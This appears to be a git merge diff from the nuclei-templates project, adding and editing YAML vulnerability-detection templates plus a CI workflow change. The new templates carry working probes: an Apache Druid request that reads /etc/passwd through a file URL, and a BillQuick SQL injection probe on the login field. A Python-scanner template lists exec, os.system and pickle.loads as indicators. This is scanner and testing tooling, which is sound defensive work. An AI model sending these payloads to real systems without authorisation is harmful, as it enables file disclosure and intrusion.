Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into CNVD-2019-06255
commit
50d1f3753d
|
@ -20,10 +20,8 @@ jobs:
|
|||
|
||||
- name: Installing Nuclei
|
||||
# if: steps.cache-go.outputs.cache-hit != 'true'
|
||||
env:
|
||||
GO111MODULE: on
|
||||
run: |
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
|
||||
shell: bash
|
||||
|
||||
- name: Template Validation
|
||||
|
|
|
@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | |
|
||||
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | |
|
||||
|
||||
**176 directories, 2418 files**.
|
||||
**177 directories, 2443 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2021-36749
|
||||
|
||||
info:
|
||||
name: Apache Druid Authentication Restrictions Bypass
|
||||
author: _0xf4n9x_
|
||||
severity: medium
|
||||
description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-36749
|
||||
- https://www.cvedetails.com/cve/CVE-2021-36749/
|
||||
- https://github.com/BrucessKING/CVE-2021-36749
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 6.5
|
||||
cve-id: CVE-2021-36749
|
||||
cwe-id: CWE-668
|
||||
tags: cve,cve2021,apache,lfi,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- "druid:*:1000:1000:"
|
||||
condition: or
|
|
@ -0,0 +1,64 @@
|
|||
id: CVE-2021-42258
|
||||
|
||||
info:
|
||||
name: BillQuick Web Suite SQLi
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
tags: cve,cve2021,sqli,billquick
|
||||
description: |
|
||||
BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
|
||||
allows SQL injection for unauthenticated remote code execution,
|
||||
as exploited in the wild in October 2021 for ransomware installation.
|
||||
SQL injection can, for example, use the txtID (aka username) parameter.
|
||||
Successful exploitation can include the ability to execute
|
||||
arbitrary code as MSSQLSERVER$ via xp_cmdshell.
|
||||
reference:
|
||||
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{BaseURL}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
|
||||
|
||||
cookie-reuse: true
|
||||
extractors:
|
||||
- type: xpath
|
||||
name: VS
|
||||
internal: true
|
||||
attribute: value
|
||||
xpath:
|
||||
- "/html/body/form/div/input[@id='__VIEWSTATE']"
|
||||
|
||||
- type: xpath
|
||||
name: VSG
|
||||
internal: true
|
||||
attribute: value
|
||||
xpath:
|
||||
- "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
|
||||
|
||||
- type: xpath
|
||||
name: EV
|
||||
internal: true
|
||||
attribute: value
|
||||
xpath:
|
||||
- "/html/body/form/div/input[@id='__EVENTVALIDATION']"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
condition: and
|
||||
words:
|
||||
- "System.Data.SqlClient.SqlException"
|
||||
- "Incorrect syntax near"
|
||||
- "_ACCOUNTLOCKED"
|
|
@ -0,0 +1,22 @@
|
|||
id: redis-commander-exposure
|
||||
|
||||
info:
|
||||
name: Redis Commander Exposure
|
||||
author: dahse89
|
||||
severity: low
|
||||
reference:
|
||||
- https://joeferner.github.io/redis-commander/
|
||||
- https://github.com/joeferner/redis-commander
|
||||
tags: panel,redis
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- "<title>Redis Commander"
|
||||
- "redisCommanderBearerToken"
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Python Scanner
|
||||
author: majidmc2
|
||||
severity: info
|
||||
description: Scan for dangerous Python functions
|
||||
description: Indicators for dangerous Python functions
|
||||
reference:
|
||||
- https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html
|
||||
- https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html
|
||||
|
@ -17,7 +17,7 @@ file:
|
|||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: Possible Code Injection
|
||||
name: code-injection
|
||||
regex:
|
||||
- 'exec'
|
||||
- 'eval'
|
||||
|
@ -25,7 +25,7 @@ file:
|
|||
|
||||
|
||||
- type: regex
|
||||
name: Possible Command Injection
|
||||
name: command-injection
|
||||
regex:
|
||||
- 'subprocess.call\(.*shell=True.*\)'
|
||||
- 'os.system'
|
||||
|
@ -33,18 +33,18 @@ file:
|
|||
|
||||
|
||||
- type: regex
|
||||
name: Possibly Unpickling untrusted source
|
||||
name: untrusted-source
|
||||
regex:
|
||||
- 'pickle.loads'
|
||||
- 'cPickle.loads'
|
||||
|
||||
|
||||
- type: regex
|
||||
name: Possibly loading dangerous YAMLs
|
||||
name: dangerous-yaml
|
||||
regex:
|
||||
- 'yaml.load'
|
||||
|
||||
- type: regex
|
||||
name: Possible SQLi
|
||||
name: sqli
|
||||
regex:
|
||||
- 'cursor.execute'
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Solar-Log 500 2.8.2 - Incorrect Access Control
|
||||
author: geeknik
|
||||
severity: high
|
||||
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers>
|
||||
description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server
|
||||
reference: https://www.exploit-db.com/exploits/49986
|
||||
tags: solarlog,auth-bypass
|
||||
|
||||
|
|
|
@ -3,6 +3,7 @@ info:
|
|||
name: UEditor Arbitrary File Upload
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code.
|
||||
reference:
|
||||
- https://zhuanlan.zhihu.com/p/85265552
|
||||
- https://www.freebuf.com/vuls/181814.html
|
||||
|
|
|
@ -3,6 +3,7 @@ info:
|
|||
name: Unauthenticated Spark REST API
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it.
|
||||
reference: https://xz.aliyun.com/t/2490
|
||||
tags: spark,unauth
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
|
||||
author: geeknik
|
||||
severity: low
|
||||
description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
|
||||
reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
|
||||
tags: crlf,viewlinc
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Vehicle Parking Management System 1.0 - Authentication Bypass
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
|
||||
reference: https://www.exploit-db.com/exploits/48877
|
||||
tags: auth-bypass
|
||||
requests:
|
||||
|
|
|
@ -3,6 +3,7 @@ info:
|
|||
name: WebUI 1.5b6 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
|
||||
reference: https://www.exploit-db.com/exploits/36821
|
||||
tags: webui,rce
|
||||
|
||||
|
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: pikpikcu
|
||||
severity: medium
|
||||
tags: xss
|
||||
|
||||
description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: SMTP WP Plugin Directory listing enabled
|
||||
author: PR3R00T
|
||||
severity: high
|
||||
description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access.
|
||||
reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
|
||||
tags: wordpress,wp-plugin
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: WordPress Attitude Themes 1.1.1 Open Redirection
|
||||
author: 0x_Akoko
|
||||
severity: low
|
||||
description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
|
||||
reference: https://cxsecurity.com/issue/WLB-2020030183
|
||||
tags: wordpress,wp-theme,redirect
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection
|
||||
author: 0x_Akoko
|
||||
severity: low
|
||||
description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL.
|
||||
reference: https://cxsecurity.com/issue/WLB-2020040103
|
||||
tags: wordpress,wp-plugin,redirect
|
||||
|
||||
|
|
|
@ -3,6 +3,7 @@ info:
|
|||
name: WordPress accessible wp-config
|
||||
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
|
||||
severity: high
|
||||
description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading.
|
||||
tags: wordpress,backup
|
||||
|
||||
requests:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: WordPress Oxygen-Theme Themes LFI
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter.
|
||||
tags: wordpress,wp-theme,lfi
|
||||
reference: https://cxsecurity.com/issue/WLB-2019030178
|
||||
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: wordpress-upload-data
|
||||
author: pussycat0x
|
||||
severity: medium
|
||||
description: Searches for Passwords in the wordpress uploads directory.
|
||||
description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
|
||||
reference: https://www.exploit-db.com/ghdb/7040
|
||||
tags: wordpress,listing
|
||||
|
||||
|
|
Loading…
Reference in New Issue